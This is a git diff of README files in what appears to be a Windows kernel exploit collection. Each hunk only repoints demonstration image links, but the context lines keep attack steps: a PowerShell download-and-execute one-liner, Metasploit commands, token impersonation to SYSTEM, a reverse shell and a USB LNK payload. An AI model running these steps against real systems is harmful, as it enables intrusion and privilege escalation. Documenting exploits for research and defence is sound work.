2008 R2 SP1 x64 -![13](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-1701_win2008_x64.gif) \ No newline at end of file +![13](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-1701_win2008_x64.gif) \ No newline at end of file diff --git a/CVE-2015-2370/README.md b/CVE-2015-2370/README.md index 73b9cf2..a5d535d 100644 --- a/CVE-2015-2370/README.md +++ b/CVE-2015-2370/README.md @@ -36,7 +36,7 @@ Trebuchet.exe c:\Users\ascotbe\Desktop\test.txt c:\Windows\System32\test1.txt 演示机器Windows 7 SP1 x86 -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-2370_win7_x86.png) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-2370_win7_x86.png) #### 分析文章 - http://bobao.360.cn/learning/detail/584.html diff --git a/CVE-2015-2370/README_EN.md b/CVE-2015-2370/README_EN.md index 2487a36..48905ef 100644 --- a/CVE-2015-2370/README_EN.md +++ b/CVE-2015-2370/README_EN.md @@ -36,7 +36,7 @@ Trebuchet.exe c:\Users\ascotbe\Desktop\test.txt c:\Windows\System32\test1.txt Demonstrate Machine Windows 7 SP1 x86 -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-2370_win7_x86.png) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-2370_win7_x86.png) #### Analyze - http://bobao.360.cn/learning/detail/584.html diff --git a/CVE-2015-2387/README.md b/CVE-2015-2387/README.md index cb3ac83..43ab3c2 100644 --- a/CVE-2015-2387/README.md +++ b/CVE-2015-2387/README.md @@ -31,5 +31,5 @@ Adobe Type Manager字体驱动程序中的ATMFD.DLL允许本地用户通过精 演示系统Windows Server 2003 SP2 x86 -![3](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-2387_win2003_sp2_x86.gif) +![3](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-2387_win2003_sp2_x86.gif) diff --git a/CVE-2015-2387/README_EN.md b/CVE-2015-2387/README_EN.md index e744f5e..0129d29 100644 --- a/CVE-2015-2387/README_EN.md +++ b/CVE-2015-2387/README_EN.md @@ -32,5 +32,5 @@ Currently compiled only the `CVE-2015-2387_X86` project,`CVE-2015-2387_X64` pr Demo System Windows Server 2003 SP2 x86 -![3](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-2387_win2003_sp2_x86.gif) +![3](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-2387_win2003_sp2_x86.gif) diff --git a/CVE-2015-2546/README.md b/CVE-2015-2546/README.md index b75a4d3..f9af3df 100644 --- a/CVE-2015-2546/README.md +++ b/CVE-2015-2546/README.md @@ -28,7 +28,7 @@ 测试机器Windows 7 SP1 x86,当前只有x86版本的EXP,测试GIF图 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-2546_win7_x86.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-2546_win7_x86.gif) #### 分析文章 - http://drops.xmd5.com/static/drops/papers-9276.html diff --git a/CVE-2015-2546/README_EN.md b/CVE-2015-2546/README_EN.md index 2de83b1..57b6ed5 100644 --- a/CVE-2015-2546/README_EN.md +++ b/CVE-2015-2546/README_EN.md @@ -29,7 +29,7 @@ CompilerEnvironment Test Machine Windows 7 SP1 X86, current only X86 version of Exp, test GIF map -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-2546_win7_x86.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-2546_win7_x86.gif) #### Analyze - http://drops.xmd5.com/static/drops/papers-9276.html diff --git a/CVE-2016-0041/README.md b/CVE-2016-0041/README.md index 725b930..5d50dee 100644 --- a/CVE-2016-0041/README.md +++ b/CVE-2016-0041/README.md @@ -35,7 +35,7 @@ run 可以看到如下的反弹shell -![CVE-2016-0041_win7_sp1_x64_01](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0041_win7_sp1_x64_01.png) +![CVE-2016-0041_win7_sp1_x64_01](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0041_win7_sp1_x64_01.png) 接着使用提权漏洞 @@ -45,6 +45,6 @@ set session 2#你当前的session run ``` -![CVE-2016-0041_win7_sp1_x64_02](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0041_win7_sp1_x64_02.png) +![CVE-2016-0041_win7_sp1_x64_02](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0041_win7_sp1_x64_02.png) 可以看到我们最后成为了SYSTEM权限 \ No newline at end of file diff --git a/CVE-2016-0041/README_EN.md b/CVE-2016-0041/README_EN.md index 256e353..cb30932 100644 --- a/CVE-2016-0041/README_EN.md +++ b/CVE-2016-0041/README_EN.md @@ -36,7 +36,7 @@ run You can see the following rebound shell -![CVE-2016-0041_win7_sp1_x64_01](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0041_win7_sp1_x64_01.png) +![CVE-2016-0041_win7_sp1_x64_01](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0041_win7_sp1_x64_01.png) Then use the rights vulnerability @@ -46,6 +46,6 @@ set session 2#你当前的session run ``` -![CVE-2016-0041_win7_sp1_x64_02](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0041_win7_sp1_x64_02.png) +![CVE-2016-0041_win7_sp1_x64_02](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0041_win7_sp1_x64_02.png) You can see that we finally became SYSTEM permissions. \ No newline at end of file diff --git a/CVE-2016-0051/README.md b/CVE-2016-0051/README.md index c26cc72..633f60f 100644 --- a/CVE-2016-0051/README.md +++ b/CVE-2016-0051/README.md @@ -27,5 +27,5 @@ 测试机器Windows 7 SP1 x86。需要把**CVE-2016-0051_x86.zip**解压后的两个文件放到目标中 -![8](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0051_win7_x86.gif) +![8](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0051_win7_x86.gif) diff --git a/CVE-2016-0051/README_EN.md b/CVE-2016-0051/README_EN.md index 77f0cbb..8b72a94 100644 --- a/CVE-2016-0051/README_EN.md +++ b/CVE-2016-0051/README_EN.md @@ -27,5 +27,5 @@ CompilerEnvironment Test Machine Windows 7 SP1 x86. Need to decompress the two files after the **CVE-2016-0051_X86.zip** is placed in the target -![8](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0051_win7_x86.gif) +![8](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0051_win7_x86.gif) diff --git a/CVE-2016-0095/README.md b/CVE-2016-0095/README.md index 68be6dd..55f1227 100644 --- a/CVE-2016-0095/README.md +++ b/CVE-2016-0095/README.md @@ -25,7 +25,7 @@ 测试Windows 7 SP1 x64的GIF图 -![5](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0095_win7_x64.gif) +![5](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0095_win7_x64.gif) #### 分析文章 - https://xz.aliyun.com/t/6008 diff --git a/CVE-2016-0095/README_EN.md b/CVE-2016-0095/README_EN.md index 98b5249..7523785 100644 --- a/CVE-2016-0095/README_EN.md +++ b/CVE-2016-0095/README_EN.md @@ -25,7 +25,7 @@ The X64 version in the project is perfect for Windows 7 SP1 X64 and Windows Serv Test the GIF map of Windows 7 SP1 X64 -![5](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0095_win7_x64.gif) +![5](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0095_win7_x64.gif) #### Analyze - https://xz.aliyun.com/t/6008 diff --git a/CVE-2016-0099/README.md b/CVE-2016-0099/README.md index a291e56..4c4ff30 100644 --- a/CVE-2016-0099/README.md +++ b/CVE-2016-0099/README.md @@ -38,9 +38,9 @@ powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(' GIF图如下 -![6](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0099_win2008_x64_ps.gif) +![6](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0099_win2008_x64_ps.gif) 利用exe文件测试通杀x64和x86的所有版本,这边只录制Windows 7 SP1 x64版本的 -![7](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0099_win7_x64.gif) +![7](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0099_win7_x64.gif) diff --git a/CVE-2016-0099/README_EN.md b/CVE-2016-0099/README_EN.md index f91b76f..774a577 100644 --- a/CVE-2016-0099/README_EN.md +++ b/CVE-2016-0099/README_EN.md @@ -38,9 +38,9 @@ powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(' GIF map is as follows -![6](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0099_win2008_x64_ps.gif) +![6](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0099_win2008_x64_ps.gif) Test all the versions of X64 and X86 using the EXE file, which only records Windows 7 SP1 X64 version -![7](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-0099_win7_x64.gif) +![7](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-0099_win7_x64.gif) diff --git a/CVE-2016-3225/README.md b/CVE-2016-3225/README.md index e83563b..41d616f 100644 --- a/CVE-2016-3225/README.md +++ b/CVE-2016-3225/README.md @@ -31,7 +31,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3225 Windows 7 SP1 x64测试中,使用`whoami /priv`命令查看发现并无**SeImpersonatePrivilege**特权烂土豆提权需要该特权为开启状态,所以测试的时候直接用管理员权限运行 -![image-20200819140202765](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64.png) +![image-20200819140202765](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64.png) 利用MSF+烂土豆提权,首先我们假定机器已经上线,通过msf中自带的插件来识别当前系统中可以利用的EXP来进行提权 @@ -43,11 +43,11 @@ run 如果没有用管理员权限运行MSF生成的exe的话,脚本检测是这样的 -![image-20200819112155945](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64_msf_1.png) +![image-20200819112155945](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64_msf_1.png) 如果使用管理员权限运行的话检测是这样的,可以看到比上面多了个ms16_075 -![image-20200819140819782](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64_msf_2.png) +![image-20200819140819782](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64_msf_2.png) 编译好烂土豆的文件 @@ -71,11 +71,11 @@ list_tokens -u #列出目标主机用户的可用令牌 impersonate_token "NT AUTHORITY\SYSTEM"#假冒目标主机上的可用令牌 ``` -![image-20200819141240274](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64_msf_3.png) +![image-20200819141240274](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64_msf_3.png) 进入shell查看 -![image-20200819141337651](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64_msf_4.png) +![image-20200819141337651](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64_msf_4.png) > 第二种利用方式 @@ -85,5 +85,5 @@ impersonate_token "NT AUTHORITY\SYSTEM"#假冒目标主机上的可用令牌 由于普通账号没有**SeImpersonatePrivilege**特权,这边用管理员账号来演示,利用程序**potatoNG.exe**直接上GIF图 -![4](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64.gif) +![4](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64.gif) diff --git a/CVE-2016-3225/README_EN.md b/CVE-2016-3225/README_EN.md index 07666b1..67aac71 100644 --- a/CVE-2016-3225/README_EN.md +++ b/CVE-2016-3225/README_EN.md @@ -32,7 +32,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3225 Windows 7 SP1 x64测试中,use `whoami /priv` Command View Discovery None **SeiMpersonateprivilege** Privilege Potato Right requires this privilege to turn on, so use administrator privileges when testing -![image-20200819140202765](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64.png) +![image-20200819140202765](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64.png) Use MSF + rotten potatoes,First we assume that the machine has been launched, through the plugins from the MSF to identify the EXP you can take advantage of the current system to carry out rights @@ -44,11 +44,11 @@ run If you do not run the MSF generated EXE, the script test is like this. -![image-20200819112155945](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64_msf_1.png) +![image-20200819112155945](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64_msf_1.png) If you use the administrator privilege to run, you can see more than the above MS16_075. -![image-20200819140819782](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64_msf_2.png) +![image-20200819140819782](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64_msf_2.png) Compiling the files of bad potatoes @@ -72,11 +72,11 @@ list_tokens -u #列出目标主机用户的可用令牌 impersonate_token "NT AUTHORITY\SYSTEM"#假冒目标主机上的可用令牌 ``` -![image-20200819141240274](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64_msf_3.png) +![image-20200819141240274](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64_msf_3.png) Enter the Shell View -![image-20200819141337651](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64_msf_4.png) +![image-20200819141337651](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64_msf_4.png) > Second utilization @@ -86,5 +86,5 @@ CompilerEnvironment Since there is no **Seimpersonateprivilege** privilege, this is demonstrated by the administrator account, using the program **potatoNG.exe** directly GIF map -![4](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3225_win7_x64.gif) +![4](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3225_win7_x64.gif) diff --git a/CVE-2016-3371/README.md b/CVE-2016-3371/README.md index a704765..5523765 100644 --- a/CVE-2016-3371/README.md +++ b/CVE-2016-3371/README.md @@ -30,7 +30,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3371 测试系统Windows 8.1 x64 -![4](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3371_win_8.1_x64.gif) +![4](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3371_win_8.1_x64.gif) #### 项目来源 diff --git a/CVE-2016-3371/README_EN.md b/CVE-2016-3371/README_EN.md index 0d50420..8d17768 100644 --- a/CVE-2016-3371/README_EN.md +++ b/CVE-2016-3371/README_EN.md @@ -31,7 +31,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-3371 Test system Windows 8.1 x64 -![4](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-3371_win_8.1_x64.gif) +![4](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-3371_win_8.1_x64.gif) #### ProjectSource diff --git a/CVE-2016-7255/README.md b/CVE-2016-7255/README.md index 6150a3d..dadffd7 100644 --- a/CVE-2016-7255/README.md +++ b/CVE-2016-7255/README.md @@ -37,7 +37,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-7255 通过ps脚本进行演示,直接上GIF图 -![3](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-7255_win7_x86.gif) +![3](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-7255_win7_x86.gif) #### 分析文章 - https://www.anquanke.com/post/id/85232 \ No newline at end of file diff --git a/CVE-2016-7255/README_EN.md b/CVE-2016-7255/README_EN.md index 07f6c22..353f9ec 100644 --- a/CVE-2016-7255/README_EN.md +++ b/CVE-2016-7255/README_EN.md @@ -37,7 +37,7 @@ This vulnerability kills all affected system X64 versions, three Exp can be used Demo through the PS script, directly on the GIF map -![3](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2016-7255_win7_x86.gif) +![3](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2016-7255_win7_x86.gif) #### Analyze - https://www.anquanke.com/post/id/85232 \ No newline at end of file diff --git a/CVE-2017-0101/README.md b/CVE-2017-0101/README.md index 7a4a3c1..54ba117 100644 --- a/CVE-2017-0101/README.md +++ b/CVE-2017-0101/README.md @@ -26,7 +26,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0101 测试Windows 7 SP1 x86通过,直接上GIF图 -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-0101_win7_x86.gif) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0101_win7_x86.gif) #### 分析文章 - https://paper.seebug.org/586/ diff --git a/CVE-2017-0101/README_EN.md b/CVE-2017-0101/README_EN.md index 8f14cb4..1f7a617 100644 --- a/CVE-2017-0101/README_EN.md +++ b/CVE-2017-0101/README_EN.md @@ -27,7 +27,7 @@ CompilerEnvironment Test Windows 7 SP1 X86 pass, directly on GIF map -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-0101_win7_x86.gif) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0101_win7_x86.gif) #### Analyze - https://paper.seebug.org/586/ diff --git a/CVE-2017-0143/README.md b/CVE-2017-0143/README.md index 96b1ee2..e3ca89e 100644 --- a/CVE-2017-0143/README.md +++ b/CVE-2017-0143/README.md @@ -37,11 +37,11 @@ set RHOSTS 192.168.0.128 run ``` -![image-20200818114043309](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-0143_msf_1.png) +![image-20200818114043309](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0143_msf_1.png) 并且权限是system的 -![image-20200818114925926](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-0143_msf_2.png) +![image-20200818114925926](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0143_msf_2.png) #### 分析文章 diff --git a/CVE-2017-0143/README_EN.md b/CVE-2017-0143/README_EN.md index a4b8354..0a057eb 100644 --- a/CVE-2017-0143/README_EN.md +++ b/CVE-2017-0143/README_EN.md @@ -38,11 +38,11 @@ set RHOSTS 192.168.0.128 run ``` -![image-20200818114043309](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-0143_msf_1.png) +![image-20200818114043309](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0143_msf_1.png) And the permissions are SYSTEM -![image-20200818114925926](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-0143_msf_2.png) +![image-20200818114925926](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0143_msf_2.png) #### Analyze diff --git a/CVE-2017-0213/README.md b/CVE-2017-0213/README.md index 1c2d314..c1498a5 100644 --- a/CVE-2017-0213/README.md +++ b/CVE-2017-0213/README.md @@ -36,7 +36,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0213 测试环境Windows 7 SP1 x64 -![CVE-2017-0213_win7_x86](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-0213_win7_x86.gif) +![CVE-2017-0213_win7_x86](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0213_win7_x86.gif) #### 分析文章 - https://cloud.tencent.com/developer/article/1045805 \ No newline at end of file diff --git a/CVE-2017-0213/README_EN.md b/CVE-2017-0213/README_EN.md index 14887d8..bedcc56 100644 --- a/CVE-2017-0213/README_EN.md +++ b/CVE-2017-0213/README_EN.md @@ -36,7 +36,7 @@ CompilerEnvironment Test environment Windows 7 SP1 x64 -![CVE-2017-0213_win7_x86](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-0213_win7_x86.gif) +![CVE-2017-0213_win7_x86](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-0213_win7_x86.gif) #### Analyze - https://cloud.tencent.com/developer/article/1045805 \ No newline at end of file diff --git a/CVE-2017-8464/README.md b/CVE-2017-8464/README.md index 3b71a4e..312eca8 100644 --- a/CVE-2017-8464/README.md +++ b/CVE-2017-8464/README.md @@ -41,7 +41,7 @@ run 生成文件 -![CVE-2017-8464_win7_x86_msf](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-8464_win7_x86_msf.png) +![CVE-2017-8464_win7_x86_msf](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-8464_win7_x86_msf.png) 运行命令把它拷贝到test目录下 @@ -49,7 +49,7 @@ run cp -r /root/.msf4/local/ /root/test ``` -![CVE-2017-8464_win7_x86_msf2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-8464_win7_x86_msf2.png) +![CVE-2017-8464_win7_x86_msf2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-8464_win7_x86_msf2.png) 接着把这些文件全部拷贝到U盘中,然后插上电脑即可 @@ -61,7 +61,7 @@ https://github.com/Ascotbe/WinKernelhub/tree/master/Patch GIF图如下 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-8464_win7_x86.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-8464_win7_x86.gif) #### 分析文章 - https://my.oschina.net/u/4310658/blog/3695267 diff --git a/CVE-2017-8464/README_EN.md b/CVE-2017-8464/README_EN.md index e853fbe..72b5154 100644 --- a/CVE-2017-8464/README_EN.md +++ b/CVE-2017-8464/README_EN.md @@ -42,7 +42,7 @@ run Generate files -![CVE-2017-8464_win7_x86_msf](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-8464_win7_x86_msf.png) +![CVE-2017-8464_win7_x86_msf](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-8464_win7_x86_msf.png) Run the command to copy it into the test directory @@ -50,7 +50,7 @@ Run the command to copy it into the test directory cp -r /root/.msf4/local/ /root/test ``` -![CVE-2017-8464_win7_x86_msf2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-8464_win7_x86_msf2.png) +![CVE-2017-8464_win7_x86_msf2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-8464_win7_x86_msf2.png) Then copy all of these files to the U disk, then plug in the computer. @@ -62,7 +62,7 @@ https://github.com/Ascotbe/WinKernelhub/tree/master/Patch GIF map is as follows -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2017-8464_win7_x86.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2017-8464_win7_x86.gif) #### Analyze - https://my.oschina.net/u/4310658/blog/3695267 diff --git a/CVE-2018-0833/README.md b/CVE-2018-0833/README.md index 00c32b3..ba1a6ab 100644 --- a/CVE-2018-0833/README.md +++ b/CVE-2018-0833/README.md @@ -26,7 +26,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0833 效果图如下 -![CVE](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-0833.gif) +![CVE](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-0833.gif) #### 分析文章 - https://de4dcr0w.github.io/cve%E6%BC%8F%E6%B4%9E/SMBv3%E6%97%A0%E6%95%88%E6%8C%87%E9%92%88%E5%BC%95%E7%94%A8%E6%BC%8F%E6%B4%9E(CVE-2018-0833).html diff --git a/CVE-2018-0833/README_EN.md b/CVE-2018-0833/README_EN.md index fdd85bd..c8708a3 100644 --- a/CVE-2018-0833/README_EN.md +++ b/CVE-2018-0833/README_EN.md @@ -27,7 +27,7 @@ First, use a machine (test Used Kali) to run the Python script in the project, t The effect picture is as follows -![CVE](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-0833.gif) +![CVE](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-0833.gif) #### Analyze - https://de4dcr0w.github.io/cve%E6%BC%8F%E6%B4%9E/SMBv3%E6%97%A0%E6%95%88%E6%8C%87%E9%92%88%E5%BC%95%E7%94%A8%E6%BC%8F%E6%B4%9E(CVE-2018-0833).html diff --git a/CVE-2018-8120/README.md b/CVE-2018-8120/README.md index 7386493..31eeeed 100644 --- a/CVE-2018-8120/README.md +++ b/CVE-2018-8120/README.md @@ -27,7 +27,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120 当前测试系统Windows 7 SP1 x64 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8120_win7_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-8120_win7_x64.gif) #### 分析文章 - https://github.com/EVOL4/CVE-2018-8120/blob/master/CVE-2018-8120.md diff --git a/CVE-2018-8120/README_EN.md b/CVE-2018-8120/README_EN.md index b63e599..b9164b8 100644 --- a/CVE-2018-8120/README_EN.md +++ b/CVE-2018-8120/README_EN.md @@ -27,7 +27,7 @@ CompilerEnvironment Test system Windows 7 SP1 x64 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8120_win7_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-8120_win7_x64.gif) #### Analyze - https://github.com/EVOL4/CVE-2018-8120/blob/master/CVE-2018-8120.md diff --git a/CVE-2018-8453/README.md b/CVE-2018-8453/README.md index 62f2ea5..ef7ede7 100644 --- a/CVE-2018-8453/README.md +++ b/CVE-2018-8453/README.md @@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453 测试系统Windows 10 1709 x64 -![CVE-2018-8453](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8453_win10_1709_x64.gif) +![CVE-2018-8453](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-8453_win10_1709_x64.gif) #### 分析文章 - https://github.com/thepwnrip/leHACK-Analysis-of-CVE-2018-8453 diff --git a/CVE-2018-8453/README_EN.md b/CVE-2018-8453/README_EN.md index b643a84..73cdb13 100644 --- a/CVE-2018-8453/README_EN.md +++ b/CVE-2018-8453/README_EN.md @@ -40,7 +40,7 @@ CompilerEnvironment Test system Windows 10 1709 x64 -![CVE-2018-8453](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8453_win10_1709_x64.gif) +![CVE-2018-8453](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-8453_win10_1709_x64.gif) #### Analyze - https://github.com/thepwnrip/leHACK-Analysis-of-CVE-2018-8453 diff --git a/CVE-2018-8639/README.md b/CVE-2018-8639/README.md index d56e930..73f94e6 100644 --- a/CVE-2018-8639/README.md +++ b/CVE-2018-8639/README.md @@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8639 在Windows 2008 R2 SP1 X64上测试通过的EXP,直接上GIF图 -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8639_win2008_r2_sp1_x64.gif) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-8639_win2008_r2_sp1_x64.gif) @@ -54,7 +54,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8639 Windows 7 SP1 X64测试通过的EXP,上GIF图 -![3](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8639_win7_sp1_x64.gif) +![3](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-8639_win7_sp1_x64.gif) #### 分析文章 - https://www.anquanke.com/post/id/183358 diff --git a/CVE-2018-8639/README_EN.md b/CVE-2018-8639/README_EN.md index d02825e..cc6046e 100644 --- a/CVE-2018-8639/README_EN.md +++ b/CVE-2018-8639/README_EN.md @@ -40,7 +40,7 @@ CompilerEnvironment Windows 2008 R2 SP1 X64 test passed EXP, directly on GIF map -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8639_win2008_r2_sp1_x64.gif) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-8639_win2008_r2_sp1_x64.gif) @@ -54,7 +54,7 @@ CompilerEnvironment Windows 7 SP1 X64 test via EXP, on GIF map -![3](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8639_win7_sp1_x64.gif) +![3](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2018-8639_win7_sp1_x64.gif) #### Analyze - https://www.anquanke.com/post/id/183358 diff --git a/CVE-2019-0623/README.md b/CVE-2019-0623/README.md index d85d708..b9664e9 100644 --- a/CVE-2019-0623/README.md +++ b/CVE-2019-0623/README.md @@ -38,7 +38,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0623 改POC只对x86的机器有效,测试机器为Windows 7 SP1 x86 -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-0623_win_7_sp1_x86.gif) 